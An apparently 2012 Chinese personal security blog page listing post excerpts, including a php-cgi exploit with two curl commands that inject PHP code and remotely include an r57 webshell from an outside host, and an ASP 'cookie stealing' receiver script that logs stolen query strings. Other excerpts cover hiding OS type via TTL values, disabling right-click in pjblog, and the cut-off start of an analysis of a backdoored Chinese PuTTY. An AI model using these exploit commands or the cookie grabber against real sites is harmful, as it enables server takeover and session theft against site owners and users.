[置顶]2011年10月9日,臭袜子's blog正式建成!
作者:chouwazi 日期:2011-10-09 12:34:47
php-cgi漏洞利用EXP
作者:chouwazi 日期:2012-05-20 02:31:26
1、本地包含直接执行代码:
- curl -H "USER-AGENT: <?system('id');die();?>" http://www.chouwazi.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n
2、远程包含执行代码:
- curl http://www.chouwazi.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.chouwazi.com/r57.txt
windows系统和Linux系统下修改TTL值
作者:chouwazi 日期:2012-05-20 01:53:18
黑客在测试到服务器操作类型后,可能会针对该操作系统做相应的攻击
- Linux系统的TTL值为64,
- Windows NT/2000/XP系统的TTL值为128,
- Windows 98系统的TTL值为32,
- UNIX主机的TTL值为255。
可以按以下方法修改TTL的默认值,以达到隐藏服务器操作系统类型的目的。
Windows下修改TTL
打开注册表编辑器
- HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
pjblog禁止右键复制的代码
作者:chouwazi 日期:2012-05-20 01:41:10
pjblog添加禁止右键的代码,用了段时间,觉得还是删除了比较好。
以前是在很气愤的情况下加入的,但是现在想想也觉得没必要那么的在意吧。
在系统首页文件(default.asp)和日志文件(article.asp)最底下加入如下代码即可。
这两个文件都在根目录下。
- <noscript>
- <iframe scr="*.htm"></iframe>
- </noscript>
- <script language="JavaScript">
- document.oncontextmenu=new Function("event.returnValue=false;");
- document.onselectstart=new Function("event.returnValue=false;");
- </script>
加入后就可以禁止右键复制等功能,但是仅限制于IE内核下的浏览器。
php通用防注入程序
作者:chouwazi 日期:2012-05-20 01:32:20
24岁的男人应该注意些什么
作者:chouwazi 日期:2012-05-20 01:17:55
盗取cookies的代码(asp版、php版、perl版)
作者:chouwazi 日期:2012-05-20 01:07:34
盗取cookie的代码
ASP版
- <%
- dim strfilename
- strfilename = "mydata.txt" '数据文件存放目录
- set lP=server.createObject("Adodb.Stream")
- lP.Open
- lP.Type=2
- lP.CharSet="gb2312"
- lP.writetext request.Servervariables("QUERY_STRING")
- lP.SaveToFile server.mappath(strfilename),2
- lP.Close
- set lP=nothing
- %>
中文版Putty后门分析
作者:chouwazi 日期:2012-05-20 00:11:14
作者:不走的钟
今天IT行业微博热点 中文Putty多款软件存在后门,有的说被绑马,有后门众说纷纷。简单地说软件后门可以分为二种:
一、正常软件与木马进行捆绑,当用户运行软件时,木马或者病毒自动运行,用户不知不觉便中了招。
二、在软件代码中加入了特殊代码,让软件有“特别”的功能,如发送口令到指定服务器,完成木马功能。
007安全 和众安全爱好者也参与测试了一个中文版Putty,测试结果如下:
测试网站:http://www.putty.org.cn/
测试时间:2012-1-31日
测试情况:二款软件均有后门
网站首页:
图一:
